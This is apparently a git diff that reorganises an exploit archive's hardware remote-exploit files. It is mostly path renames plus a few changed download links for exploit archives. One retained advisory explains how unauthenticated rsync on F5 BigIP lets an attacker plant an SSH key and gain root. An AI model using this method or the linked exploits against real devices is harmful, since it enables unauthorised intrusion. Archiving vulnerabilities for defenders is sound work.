index 100% rename from platforms/hardware/remote/33741.txt rename to exploits/hardware/remote/33741.txt diff --git a/platforms/hardware/remote/33742.txt b/exploits/hardware/remote/33742.txt similarity index 100% rename from platforms/hardware/remote/33742.txt rename to exploits/hardware/remote/33742.txt diff --git a/platforms/hardware/remote/33862.rb b/exploits/hardware/remote/33862.rb similarity index 100% rename from platforms/hardware/remote/33862.rb rename to exploits/hardware/remote/33862.rb diff --git a/platforms/hardware/remote/33863.rb b/exploits/hardware/remote/33863.rb similarity index 100% rename from platforms/hardware/remote/33863.rb rename to exploits/hardware/remote/33863.rb diff --git a/platforms/hardware/remote/33869.txt b/exploits/hardware/remote/33869.txt similarity index 91% rename from platforms/hardware/remote/33869.txt rename to exploits/hardware/remote/33869.txt index abdef038f..54371dbed 100644 --- a/platforms/hardware/remote/33869.txt +++ b/exploits/hardware/remote/33869.txt @@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4 Software Versions: V100R001B120Telmex, V100R001B121Telmex -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33869.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33869.tar.gz \ No newline at end of file diff --git a/platforms/hardware/remote/33938.txt b/exploits/hardware/remote/33938.txt similarity index 100% rename from platforms/hardware/remote/33938.txt rename to exploits/hardware/remote/33938.txt diff --git a/platforms/hardware/remote/33962.txt b/exploits/hardware/remote/33962.txt similarity index 100% rename from platforms/hardware/remote/33962.txt rename to exploits/hardware/remote/33962.txt diff --git a/platforms/hardware/remote/34018.txt b/exploits/hardware/remote/34018.txt similarity index 100% rename from platforms/hardware/remote/34018.txt rename to exploits/hardware/remote/34018.txt diff --git a/platforms/hardware/remote/34033.html b/exploits/hardware/remote/34033.html similarity index 100% rename from platforms/hardware/remote/34033.html rename to exploits/hardware/remote/34033.html diff --git a/platforms/hardware/remote/34063.rb b/exploits/hardware/remote/34063.rb similarity index 100% rename from platforms/hardware/remote/34063.rb rename to exploits/hardware/remote/34063.rb diff --git a/platforms/hardware/remote/34064.rb b/exploits/hardware/remote/34064.rb similarity index 100% rename from platforms/hardware/remote/34064.rb rename to exploits/hardware/remote/34064.rb diff --git a/platforms/hardware/remote/34065.rb b/exploits/hardware/remote/34065.rb similarity index 100% rename from platforms/hardware/remote/34065.rb rename to exploits/hardware/remote/34065.rb diff --git a/platforms/hardware/remote/34182.txt b/exploits/hardware/remote/34182.txt similarity index 100% rename from platforms/hardware/remote/34182.txt rename to exploits/hardware/remote/34182.txt diff --git a/platforms/hardware/remote/34184.txt b/exploits/hardware/remote/34184.txt similarity index 100% rename from platforms/hardware/remote/34184.txt rename to exploits/hardware/remote/34184.txt diff --git a/platforms/hardware/remote/34200.txt b/exploits/hardware/remote/34200.txt similarity index 100% rename from platforms/hardware/remote/34200.txt rename to exploits/hardware/remote/34200.txt diff --git a/platforms/hardware/remote/34208.txt b/exploits/hardware/remote/34208.txt similarity index 100% rename from platforms/hardware/remote/34208.txt rename to exploits/hardware/remote/34208.txt diff --git a/platforms/hardware/remote/34316.txt b/exploits/hardware/remote/34316.txt similarity index 100% rename from platforms/hardware/remote/34316.txt rename to exploits/hardware/remote/34316.txt diff --git a/platforms/hardware/remote/34465.txt b/exploits/hardware/remote/34465.txt similarity index 94% rename from platforms/hardware/remote/34465.txt rename to exploits/hardware/remote/34465.txt index 94671e412..108e11ed0 100644 --- a/platforms/hardware/remote/34465.txt +++ b/exploits/hardware/remote/34465.txt @@ -1,4 +1,4 @@ When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance. The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. -Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34465.pdf \ No newline at end of file +Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34465.pdf \ No newline at end of file diff --git a/platforms/hardware/remote/34802.html b/exploits/hardware/remote/34802.html similarity index 100% rename from platforms/hardware/remote/34802.html rename to exploits/hardware/remote/34802.html diff --git a/platforms/hardware/remote/34986.txt b/exploits/hardware/remote/34986.txt similarity index 100% rename from platforms/hardware/remote/34986.txt rename to exploits/hardware/remote/34986.txt diff --git a/platforms/hardware/remote/35014.txt b/exploits/hardware/remote/35014.txt similarity index 100% rename from platforms/hardware/remote/35014.txt rename to exploits/hardware/remote/35014.txt diff --git a/platforms/hardware/remote/35068.txt b/exploits/hardware/remote/35068.txt similarity index 100% rename from platforms/hardware/remote/35068.txt rename to exploits/hardware/remote/35068.txt diff --git a/platforms/hardware/remote/35069.txt b/exploits/hardware/remote/35069.txt similarity index 100% rename from platforms/hardware/remote/35069.txt rename to exploits/hardware/remote/35069.txt diff --git a/platforms/hardware/remote/35070.txt b/exploits/hardware/remote/35070.txt similarity index 100% rename from platforms/hardware/remote/35070.txt rename to exploits/hardware/remote/35070.txt diff --git a/platforms/hardware/remote/35071.txt b/exploits/hardware/remote/35071.txt similarity index 100% rename from platforms/hardware/remote/35071.txt rename to exploits/hardware/remote/35071.txt diff --git a/platforms/hardware/remote/35103.txt b/exploits/hardware/remote/35103.txt similarity index 100% rename from platforms/hardware/remote/35103.txt rename to exploits/hardware/remote/35103.txt diff --git a/platforms/hardware/remote/35151.rb b/exploits/hardware/remote/35151.rb similarity index 100% rename from platforms/hardware/remote/35151.rb rename to exploits/hardware/remote/35151.rb diff --git a/platforms/hardware/remote/35170.txt b/exploits/hardware/remote/35170.txt similarity index 100% rename from platforms/hardware/remote/35170.txt rename to exploits/hardware/remote/35170.txt diff --git a/platforms/hardware/remote/35184.py b/exploits/hardware/remote/35184.py similarity index 100% rename from platforms/hardware/remote/35184.py rename to exploits/hardware/remote/35184.py diff --git a/platforms/hardware/remote/35317.txt b/exploits/hardware/remote/35317.txt similarity index 100% rename from platforms/hardware/remote/35317.txt rename to exploits/hardware/remote/35317.txt diff --git a/platforms/hardware/remote/35420.txt b/exploits/hardware/remote/35420.txt similarity index 100% rename from platforms/hardware/remote/35420.txt rename to exploits/hardware/remote/35420.txt diff --git a/platforms/hardware/remote/35421.txt b/exploits/hardware/remote/35421.txt similarity index 100% rename from platforms/hardware/remote/35421.txt rename to exploits/hardware/remote/35421.txt diff --git a/platforms/hardware/remote/35422.txt b/exploits/hardware/remote/35422.txt similarity index 100% rename from platforms/hardware/remote/35422.txt rename to exploits/hardware/remote/35422.txt diff --git a/platforms/hardware/remote/35597.txt b/exploits/hardware/remote/35597.txt similarity index 100% rename from platforms/hardware/remote/35597.txt rename to exploits/hardware/remote/35597.txt diff --git a/platforms/hardware/remote/35620.txt b/exploits/hardware/remote/35620.txt similarity index 100% rename from platforms/hardware/remote/35620.txt rename to exploits/hardware/remote/35620.txt diff --git a/platforms/hardware/remote/35688.py b/exploits/hardware/remote/35688.py similarity index 100% rename from platforms/hardware/remote/35688.py rename to exploits/hardware/remote/35688.py diff --git a/platforms/hardware/remote/35762.txt b/exploits/hardware/remote/35762.txt similarity index 100% rename from platforms/hardware/remote/35762.txt rename to exploits/hardware/remote/35762.txt diff --git a/platforms/hardware/remote/35763.txt b/exploits/hardware/remote/35763.txt similarity index 100% rename from platforms/hardware/remote/35763.txt rename to exploits/hardware/remote/35763.txt diff --git a/platforms/hardware/remote/35764.txt b/exploits/hardware/remote/35764.txt similarity index 100% rename from platforms/hardware/remote/35764.txt rename to exploits/hardware/remote/35764.txt diff --git a/platforms/hardware/remote/35765.txt b/exploits/hardware/remote/35765.txt similarity index 100% rename from platforms/hardware/remote/35765.txt rename to exploits/hardware/remote/35765.txt diff --git a/platforms/hardware/remote/35766.txt b/exploits/hardware/remote/35766.txt similarity index 100% rename from platforms/hardware/remote/35766.txt rename to exploits/hardware/remote/35766.txt diff --git a/platforms/hardware/remote/35779.txt b/exploits/hardware/remote/35779.txt similarity index 100% rename from platforms/hardware/remote/35779.txt rename to exploits/hardware/remote/35779.txt diff --git a/platforms/hardware/remote/35780.txt b/exploits/hardware/remote/35780.txt similarity index 100% rename from platforms/hardware/remote/35780.txt rename to exploits/hardware/remote/35780.txt diff --git a/platforms/hardware/remote/35800.txt b/exploits/hardware/remote/35800.txt similarity index 100% rename from platforms/hardware/remote/35800.txt rename to exploits/hardware/remote/35800.txt diff --git a/platforms/hardware/remote/35817.txt b/exploits/hardware/remote/35817.txt similarity index 100% rename from platforms/hardware/remote/35817.txt rename to exploits/hardware/remote/35817.txt diff --git a/platforms/hardware/remote/35887.txt b/exploits/hardware/remote/35887.txt similarity index 100% rename from platforms/hardware/remote/35887.txt rename to exploits/hardware/remote/35887.txt diff --git a/platforms/hardware/remote/35917.txt b/exploits/hardware/remote/35917.txt similarity index 100% rename from platforms/hardware/remote/35917.txt rename to exploits/hardware/remote/35917.txt diff --git a/platforms/hardware/remote/35925.txt b/exploits/hardware/remote/35925.txt similarity index 100% rename from platforms/hardware/remote/35925.txt rename to exploits/hardware/remote/35925.txt diff --git a/platforms/hardware/remote/35932.c b/exploits/hardware/remote/35932.c similarity index 100% rename from platforms/hardware/remote/35932.c rename to exploits/hardware/remote/35932.c diff --git a/platforms/hardware/remote/35970.txt b/exploits/hardware/remote/35970.txt similarity index 100% rename from platforms/hardware/remote/35970.txt rename to exploits/hardware/remote/35970.txt diff --git a/platforms/hardware/remote/35995.sh b/exploits/hardware/remote/35995.sh similarity index 100% rename from platforms/hardware/remote/35995.sh rename to exploits/hardware/remote/35995.sh diff --git a/platforms/hardware/remote/35997.sh b/exploits/hardware/remote/35997.sh similarity index 100% rename from platforms/hardware/remote/35997.sh rename to exploits/hardware/remote/35997.sh diff --git a/platforms/hardware/remote/36014.pl b/exploits/hardware/remote/36014.pl similarity index 100% rename from platforms/hardware/remote/36014.pl rename to exploits/hardware/remote/36014.pl diff --git a/platforms/hardware/remote/36205.txt b/exploits/hardware/remote/36205.txt similarity index 100% rename from platforms/hardware/remote/36205.txt rename to exploits/hardware/remote/36205.txt diff --git a/platforms/hardware/remote/36239.txt b/exploits/hardware/remote/36239.txt similarity index 100% rename from platforms/hardware/remote/36239.txt rename to exploits/hardware/remote/36239.txt diff --git a/platforms/hardware/remote/36256.txt b/exploits/hardware/remote/36256.txt similarity index 100% rename from platforms/hardware/remote/36256.txt rename to exploits/hardware/remote/36256.txt diff --git a/platforms/hardware/remote/36428.txt b/exploits/hardware/remote/36428.txt similarity index 100% rename from platforms/hardware/remote/36428.txt rename to exploits/hardware/remote/36428.txt diff --git a/platforms/hardware/remote/36429.txt b/exploits/hardware/remote/36429.txt similarity index 100% rename from platforms/hardware/remote/36429.txt rename to exploits/hardware/remote/36429.txt diff --git a/platforms/hardware/remote/36475.txt b/exploits/hardware/remote/36475.txt similarity index 100% rename from platforms/hardware/remote/36475.txt rename to exploits/hardware/remote/36475.txt diff --git a/platforms/hardware/remote/36503.rb b/exploits/hardware/remote/36503.rb similarity index 100% rename from platforms/hardware/remote/36503.rb rename to exploits/hardware/remote/36503.rb diff --git a/platforms/hardware/remote/36504.rb b/exploits/hardware/remote/36504.rb similarity index 100% rename from platforms/hardware/remote/36504.rb rename to exploits/hardware/remote/36504.rb diff --git a/platforms/hardware/remote/36511.txt b/exploits/hardware/remote/36511.txt similarity index 100% rename from platforms/hardware/remote/36511.txt rename to exploits/hardware/remote/36511.txt diff --git a/platforms/hardware/remote/36670.txt b/exploits/hardware/remote/36670.txt similarity index 100% rename from platforms/hardware/remote/36670.txt rename to exploits/hardware/remote/36670.txt diff --git a/platforms/hardware/remote/36680.txt b/exploits/hardware/remote/36680.txt similarity index 100% rename from platforms/hardware/remote/36680.txt rename to exploits/hardware/remote/36680.txt diff --git a/platforms/hardware/remote/36767.html b/exploits/hardware/remote/36767.html similarity index 100% rename from platforms/hardware/remote/36767.html rename to exploits/hardware/remote/36767.html diff --git a/platforms/hardware/remote/36831.txt b/exploits/hardware/remote/36831.txt similarity index 100% rename from platforms/hardware/remote/36831.txt rename to exploits/hardware/remote/36831.txt diff --git a/platforms/hardware/remote/36832.txt b/exploits/hardware/remote/36832.txt similarity index 100% rename from platforms/hardware/remote/36832.txt rename to exploits/hardware/remote/36832.txt diff --git a/platforms/hardware/remote/36833.txt b/exploits/hardware/remote/36833.txt similarity index 100% rename from platforms/hardware/remote/36833.txt rename to exploits/hardware/remote/36833.txt diff --git a/platforms/hardware/remote/36864.txt b/exploits/hardware/remote/36864.txt similarity index 100% rename from platforms/hardware/remote/36864.txt rename to exploits/hardware/remote/36864.txt diff --git a/platforms/hardware/remote/36866.txt b/exploits/hardware/remote/36866.txt similarity index 100% rename from platforms/hardware/remote/36866.txt rename to exploits/hardware/remote/36866.txt diff --git a/platforms/hardware/remote/36877.html b/exploits/hardware/remote/36877.html similarity index 100% rename from platforms/hardware/remote/36877.html rename to exploits/hardware/remote/36877.html diff --git a/platforms/hardware/remote/36931.txt b/exploits/hardware/remote/36931.txt similarity index 100% rename from platforms/hardware/remote/36931.txt rename to exploits/hardware/remote/36931.txt diff --git a/platforms/hardware/remote/36945.txt b/exploits/hardware/remote/36945.txt similarity index 100% rename from platforms/hardware/remote/36945.txt rename to exploits/hardware/remote/36945.txt diff --git a/platforms/hardware/remote/36995.txt b/exploits/hardware/remote/36995.txt similarity index 100% rename from platforms/hardware/remote/36995.txt rename to exploits/hardware/remote/36995.txt diff --git a/platforms/hardware/remote/37037.txt b/exploits/hardware/remote/37037.txt similarity index 100% rename from platforms/hardware/remote/37037.txt rename to exploits/hardware/remote/37037.txt diff --git a/platforms/hardware/remote/37066.py b/exploits/hardware/remote/37066.py similarity index 100% rename from platforms/hardware/remote/37066.py rename to exploits/hardware/remote/37066.py diff --git a/platforms/hardware/remote/37141.txt b/exploits/hardware/remote/37141.txt similarity index 100% rename from platforms/hardware/remote/37141.txt rename to exploits/hardware/remote/37141.txt diff --git a/platforms/hardware/remote/37170.rb b/exploits/hardware/remote/37170.rb similarity index 100% rename from platforms/hardware/remote/37170.rb rename to exploits/hardware/remote/37170.rb diff --git a/platforms/hardware/remote/37171.rb b/exploits/hardware/remote/37171.rb similarity index 100% rename from platforms/hardware/remote/37171.rb rename to exploits/hardware/remote/37171.rb diff --git a/platforms/hardware/remote/37184.py b/exploits/hardware/remote/37184.py similarity index 100% rename from platforms/hardware/remote/37184.py rename to exploits/hardware/remote/37184.py diff --git a/platforms/hardware/remote/37405.py b/exploits/hardware/remote/37405.py similarity index 100% rename from platforms/hardware/remote/37405.py rename to exploits/hardware/remote/37405.py diff --git a/platforms/hardware/remote/37429.txt b/exploits/hardware/remote/37429.txt similarity index 100% rename from platforms/hardware/remote/37429.txt rename to exploits/hardware/remote/37429.txt diff --git a/platforms/hardware/remote/37512.txt b/exploits/hardware/remote/37512.txt similarity index 100% rename from platforms/hardware/remote/37512.txt rename to exploits/hardware/remote/37512.txt diff --git a/platforms/hardware/remote/37513.txt b/exploits/hardware/remote/37513.txt similarity index 100% rename from platforms/hardware/remote/37513.txt rename to exploits/hardware/remote/37513.txt diff --git a/platforms/hardware/remote/37564.txt b/exploits/hardware/remote/37564.txt similarity index 100% rename from platforms/hardware/remote/37564.txt rename to exploits/hardware/remote/37564.txt diff --git a/platforms/hardware/remote/37597.rb b/exploits/hardware/remote/37597.rb similarity index 100% rename from platforms/hardware/remote/37597.rb rename to exploits/hardware/remote/37597.rb diff --git a/platforms/hardware/remote/37628.rb b/exploits/hardware/remote/37628.rb similarity index 100% rename from platforms/hardware/remote/37628.rb rename to exploits/hardware/remote/37628.rb diff --git a/platforms/hardware/remote/37803.txt b/exploits/hardware/remote/37803.txt similarity index 100% rename from platforms/hardware/remote/37803.txt rename to exploits/hardware/remote/37803.txt diff --git a/platforms/hardware/remote/37969.txt b/exploits/hardware/remote/37969.txt similarity index 100% rename from platforms/hardware/remote/37969.txt rename to exploits/hardware/remote/37969.txt diff --git a/platforms/hardware/remote/38020.py b/exploits/hardware/remote/38020.py similarity index 100% rename from platforms/hardware/remote/38020.py rename to exploits/hardware/remote/38020.py diff --git a/platforms/hardware/remote/38100.txt b/exploits/hardware/remote/38100.txt similarity index 100% rename from platforms/hardware/remote/38100.txt rename to exploits/hardware/remote/38100.txt diff --git a/platforms/hardware/remote/38164.py b/exploits/hardware/remote/38164.py similarity index 100% rename from platforms/hardware/remote/38164.py rename to exploits/hardware/remote/38164.py diff --git a/platforms/hardware/remote/38186.txt b/exploits/hardware/remote/38186.txt similarity index 100% rename from platforms/hardware/remote/38186.txt rename to exploits/hardware/remote/38186.txt diff --git a/platforms/hardware/remote/38233.txt b/exploits/hardware/remote/38233.txt similarity index 100% rename from platforms/hardware/remote/38233.txt rename to exploits/hardware/remote/38233.txt diff --git a/platforms/hardware/remote/38242.txt b/exploits/hardware/remote/38242.txt similarity index 100% rename from platforms/hardware/remote/38242.txt rename to exploits/hardware/remote/38242.txt diff --git a/platforms/hardware/remote/38308.txt b/exploits/hardware/remote/38308.txt similarity index 100% rename from platforms/hardware/remote/38308.txt rename to exploits/hardware/remote/38308.txt diff --git a/platforms/hardware/remote/38356.txt b/exploits/hardware/remote/38356.txt similarity index 100% rename from platforms/hardware/remote/38356.txt rename to exploits/hardware/remote/38356.txt diff --git a/platforms/hardware/remote/38370.txt b/exploits/hardware/remote/38370.txt similarity index 100% rename from platforms/hardware/remote/38370.txt rename to exploits/hardware/remote/38370.txt diff --git a/platforms/hardware/remote/38389.txt b/exploits/hardware/remote/38389.txt similarity index 100% rename from platforms/hardware/remote/38389.txt rename to exploits/hardware/remote/38389.txt diff --git a/platforms/hardware/remote/38437.txt b/exploits/hardware/remote/38437.txt similarity index 100% rename from platforms/hardware/remote/38437.txt rename to exploits/hardware/remote/38437.txt diff --git a/platforms/hardware/remote/38453.txt b/exploits/hardware/remote/38453.txt similarity index 100% rename from platforms/hardware/remote/38453.txt rename to exploits/hardware/remote/38453.txt diff --git a/platforms/hardware/remote/38464.txt b/exploits/hardware/remote/38464.txt similarity index 100% rename from platforms/hardware/remote/38464.txt rename to exploits/hardware/remote/38464.txt diff --git a/platforms/hardware/remote/38481.html b/exploits/hardware/remote/38481.html similarity index 100% rename from platforms/hardware/remote/38481.html rename to exploits/hardware/remote/38481.html diff --git a/platforms/hardware/remote/38492.html b/exploits/hardware/remote/38492.html similarity index 100% rename from platforms/hardware/remote/38492.html rename to exploits/hardware/remote/38492.html diff --git a/platforms/hardware/remote/38495.html b/exploits/hardware/remote/38495.html similarity index 100% rename from platforms/hardware/remote/38495.html rename to exploits/hardware/remote/38495.html diff --git a/platforms/hardware/remote/38501.txt b/exploits/hardware/remote/38501.txt similarity index 100% rename from platforms/hardware/remote/38501.txt rename to exploits/hardware/remote/38501.txt diff --git a/platforms/hardware/remote/38536.txt b/exploits/hardware/remote/38536.txt similarity index 100% rename from platforms/hardware/remote/38536.txt rename to exploits/hardware/remote/38536.txt diff --git a/platforms/hardware/remote/38582.html b/exploits/hardware/remote/38582.html similarity index 100% rename from platforms/hardware/remote/38582.html rename to exploits/hardware/remote/38582.html diff --git a/platforms/hardware/remote/38583.html b/exploits/hardware/remote/38583.html similarity index 100% rename from platforms/hardware/remote/38583.html rename to exploits/hardware/remote/38583.html diff --git a/platforms/hardware/remote/38584.txt b/exploits/hardware/remote/38584.txt similarity index 100% rename from platforms/hardware/remote/38584.txt rename to exploits/hardware/remote/38584.txt diff --git a/platforms/hardware/remote/38591.py b/exploits/hardware/remote/38591.py similarity index 100% rename from platforms/hardware/remote/38591.py rename to exploits/hardware/remote/38591.py diff --git a/platforms/hardware/remote/38632.txt b/exploits/hardware/remote/38632.txt similarity index 100% rename from platforms/hardware/remote/38632.txt rename to exploits/hardware/remote/38632.txt diff --git a/platforms/hardware/remote/38663.txt b/exploits/hardware/remote/38663.txt similarity index 100% rename from platforms/hardware/remote/38663.txt rename to exploits/hardware/remote/38663.txt diff --git a/platforms/hardware/remote/38671.txt b/exploits/hardware/remote/38671.txt similarity index 100% rename from platforms/hardware/remote/38671.txt rename to exploits/hardware/remote/38671.txt diff --git a/platforms/hardware/remote/38692.txt b/exploits/hardware/remote/38692.txt similarity index 100% rename from platforms/hardware/remote/38692.txt rename to exploits/hardware/remote/38692.txt diff --git a/platforms/hardware/remote/38715.txt b/exploits/hardware/remote/38715.txt similarity index 100% rename from platforms/hardware/remote/38715.txt rename to exploits/hardware/remote/38715.txt diff --git a/platforms/hardware/remote/38716.txt b/exploits/hardware/remote/38716.txt similarity index 100% rename from platforms/hardware/remote/38716.txt rename to exploits/hardware/remote/38716.txt diff --git a/platforms/hardware/remote/38717.txt b/exploits/hardware/remote/38717.txt similarity index 100% rename from platforms/hardware/remote/38717.txt rename to exploits/hardware/remote/38717.txt diff --git a/platforms/hardware/remote/38718.txt b/exploits/hardware/remote/38718.txt similarity index 100% rename from platforms/hardware/remote/38718.txt rename to exploits/hardware/remote/38718.txt diff --git a/platforms/hardware/remote/38719.txt b/exploits/hardware/remote/38719.txt similarity index 100% rename from platforms/hardware/remote/38719.txt rename to exploits/hardware/remote/38719.txt diff --git a/platforms/hardware/remote/38720.txt b/exploits/hardware/remote/38720.txt similarity index 100% rename from platforms/hardware/remote/38720.txt rename to exploits/hardware/remote/38720.txt diff --git a/platforms/hardware/remote/38721.txt b/exploits/hardware/remote/38721.txt similarity index 100% rename from platforms/hardware/remote/38721.txt rename to exploits/hardware/remote/38721.txt diff --git a/platforms/hardware/remote/38722.txt b/exploits/hardware/remote/38722.txt similarity index 100% rename from platforms/hardware/remote/38722.txt rename to exploits/hardware/remote/38722.txt diff --git a/platforms/hardware/remote/38723.txt b/exploits/hardware/remote/38723.txt similarity index 100% rename from platforms/hardware/remote/38723.txt rename to exploits/hardware/remote/38723.txt diff --git a/platforms/hardware/remote/38724.txt b/exploits/hardware/remote/38724.txt similarity index 100% rename from platforms/hardware/remote/38724.txt rename to exploits/hardware/remote/38724.txt diff --git a/platforms/hardware/remote/38725.txt b/exploits/hardware/remote/38725.txt similarity index 100% rename from platforms/hardware/remote/38725.txt rename to exploits/hardware/remote/38725.txt diff --git a/platforms/hardware/remote/38726.txt b/exploits/hardware/remote/38726.txt similarity index 100% rename from platforms/hardware/remote/38726.txt rename to exploits/hardware/remote/38726.txt diff --git a/platforms/hardware/remote/38764.rb b/exploits/hardware/remote/38764.rb similarity index 100% rename from platforms/hardware/remote/38764.rb rename to exploits/hardware/remote/38764.rb diff --git a/platforms/hardware/remote/38804.py b/exploits/hardware/remote/38804.py similarity index 100% rename from platforms/hardware/remote/38804.py rename to exploits/hardware/remote/38804.py diff --git a/platforms/hardware/remote/38810.py b/exploits/hardware/remote/38810.py similarity index 100% rename from platforms/hardware/remote/38810.py rename to exploits/hardware/remote/38810.py diff --git a/platforms/hardware/remote/38824.html b/exploits/hardware/remote/38824.html similarity index 100% rename from platforms/hardware/remote/38824.html rename to exploits/hardware/remote/38824.html diff --git a/platforms/hardware/remote/38850.txt b/exploits/hardware/remote/38850.txt similarity index 100% rename from platforms/hardware/remote/38850.txt rename to exploits/hardware/remote/38850.txt diff --git a/platforms/hardware/remote/38851.html b/exploits/hardware/remote/38851.html similarity index 100% rename from platforms/hardware/remote/38851.html rename to exploits/hardware/remote/38851.html diff --git a/platforms/hardware/remote/38964.rb b/exploits/hardware/remote/38964.rb similarity index 100% rename from platforms/hardware/remote/38964.rb rename to exploits/hardware/remote/38964.rb diff --git a/platforms/hardware/remote/39089.txt b/exploits/hardware/remote/39089.txt similarity index 100% rename from platforms/hardware/remote/39089.txt rename to exploits/hardware/remote/39089.txt diff --git a/platforms/hardware/remote/39138.html b/exploits/hardware/remote/39138.html similarity index 100% rename from platforms/hardware/remote/39138.html rename to exploits/hardware/remote/39138.html diff --git a/platforms/hardware/remote/39154.txt b/exploits/hardware/remote/39154.txt similarity index 100% rename from platforms/hardware/remote/39154.txt rename to exploits/hardware/remote/39154.txt diff --git a/platforms/hardware/remote/39194.txt b/exploits/hardware/remote/39194.txt similarity index 100% rename from platforms/hardware/remote/39194.txt rename to exploits/hardware/remote/39194.txt diff --git a/platforms/hardware/remote/39195.c b/exploits/hardware/remote/39195.c similarity index 100% rename from platforms/hardware/remote/39195.c rename to exploits/hardware/remote/39195.c diff --git a/platforms/hardware/remote/39209.txt b/exploits/hardware/remote/39209.txt similarity index 100% rename from platforms/hardware/remote/39209.txt rename to exploits/hardware/remote/39209.txt diff --git a/platforms/hardware/remote/39224.py b/exploits/hardware/remote/39224.py similarity index 100% rename from platforms/hardware/remote/39224.py rename to exploits/hardware/remote/39224.py diff --git a/platforms/hardware/remote/39227.txt b/exploits/hardware/remote/39227.txt similarity index 100% rename from platforms/hardware/remote/39227.txt rename to exploits/hardware/remote/39227.txt diff --git a/platforms/hardware/remote/39278.txt b/exploits/hardware/remote/39278.txt similarity index 100% rename from platforms/hardware/remote/39278.txt rename to exploits/hardware/remote/39278.txt diff --git a/platforms/hardware/remote/39314.c b/exploits/hardware/remote/39314.c similarity index 100% rename from platforms/hardware/remote/39314.c rename to exploits/hardware/remote/39314.c diff --git a/platforms/hardware/remote/39316.pl b/exploits/hardware/remote/39316.pl similarity index 100% rename from platforms/hardware/remote/39316.pl rename to exploits/hardware/remote/39316.pl diff --git a/platforms/hardware/remote/39437.rb b/exploits/hardware/remote/39437.rb similarity index 100% rename from platforms/hardware/remote/39437.rb rename to exploits/hardware/remote/39437.rb diff --git a/platforms/hardware/remote/39522.txt b/exploits/hardware/remote/39522.txt similarity index 100% rename from platforms/hardware/remote/39522.txt rename to exploits/hardware/remote/39522.txt diff --git a/platforms/hardware/remote/39568.py b/exploits/hardware/remote/39568.py similarity index 100% rename from platforms/hardware/remote/39568.py rename to exploits/hardware/remote/39568.py diff --git a/platforms/hardware/remote/39596.py b/exploits/hardware/remote/39596.py similarity index 100% rename from platforms/hardware/remote/39596.py rename to exploits/hardware/remote/39596.py diff --git a/platforms/hardware/remote/39823.py b/exploits/hardware/remote/39823.py similarity index 100% rename from platforms/hardware/remote/39823.py rename to exploits/hardware/remote/39823.py diff --git a/platforms/hardware/remote/40120.py b/exploits/hardware/remote/40120.py similarity index 100% rename from platforms/hardware/remote/40120.py rename to exploits/hardware/remote/40120.py diff --git a/platforms/hardware/remote/40200.txt b/exploits/hardware/remote/40200.txt similarity index 100% rename from platforms/hardware/remote/40200.txt rename to exploits/hardware/remote/40200.txt diff --git a/platforms/hardware/remote/40235.py b/exploits/hardware/remote/40235.py similarity index 100% rename from platforms/hardware/remote/40235.py rename to exploits/hardware/remote/40235.py diff --git a/platforms/hardware/remote/40258.txt b/exploits/hardware/remote/40258.txt similarity index 88% rename from platforms/hardware/remote/40258.txt rename to exploits/hardware/remote/40258.txt index ecaf93f09..b420c4250 100644 --- a/platforms/hardware/remote/40258.txt +++ b/exploits/hardware/remote/40258.txt @@ -14,4 +14,4 @@ Requirements: Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40258.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40258.zip \ No newline at end of file diff --git a/platforms/hardware/remote/40275.txt b/exploits/hardware/remote/40275.txt similarity index 85% rename from platforms/hardware/remote/40275.txt rename to exploits/hardware/remote/40275.txt index d51bb40c0..c2c67d6c3 100644 --- a/platforms/hardware/remote/40275.txt +++ b/exploits/hardware/remote/40275.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40275.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40275.zip \ No newline at end of file diff --git a/platforms/hardware/remote/40386.py b/exploits/hardware/remote/40386.py similarity index 100% rename from platforms/hardware/remote/40386.py rename to exploits/hardware/remote/40386.py diff --git a/platforms/hardware/remote/40431.txt b/exploits/hardware/remote/40431.txt similarity index 100% rename from platforms/hardware/remote/40431.txt rename to exploits/hardware/remote/40431.txt diff --git a/platforms/hardware/remote/40441.py b/exploits/hardware/remote/40441.py similarity index 100% rename from platforms/hardware/remote/40441.py rename to exploits/hardware/remote/40441.py diff --git a/platforms/hardware/remote/40472.py b/exploits/hardware/remote/40472.py similarity index 100% rename from platforms/hardware/remote/40472.py rename to exploits/hardware/remote/40472.py diff --git a/platforms/hardware/remote/40474.txt b/exploits/hardware/remote/40474.txt similarity index 100% rename from platforms/hardware/remote/40474.txt rename to exploits/hardware/remote/40474.txt diff --git a/platforms/hardware/remote/40589.html b/exploits/hardware/remote/40589.html similarity index 100% rename from platforms/hardware/remote/40589.html rename to exploits/hardware/remote/40589.html diff --git a/platforms/hardware/remote/40619.py b/exploits/hardware/remote/40619.py similarity index 100% rename from platforms/hardware/remote/40619.py rename to exploits/hardware/remote/40619.py diff --git a/platforms/hardware/remote/40633.py b/exploits/hardware/remote/40633.py similarity index 100% rename from platforms/hardware/remote/40633.py rename to exploits/hardware/remote/40633.py diff --git a/platforms/hardware/remote/40643.txt b/exploits/hardware/remote/40643.txt similarity index 100% rename from platforms/hardware/remote/40643.txt rename to exploits/hardware/remote/40643.txt diff --git a/platforms/hardware/remote/40720.sh b/exploits/hardware/remote/40720.sh similarity index 100% rename from platforms/hardware/remote/40720.sh rename to exploits/hardware/remote/40720.sh diff --git a/platforms/hardware/remote/40734.sh b/exploits/hardware/remote/40734.sh similarity index 100% rename from platforms/hardware/remote/40734.sh rename to exploits/hardware/remote/40734.sh diff --git 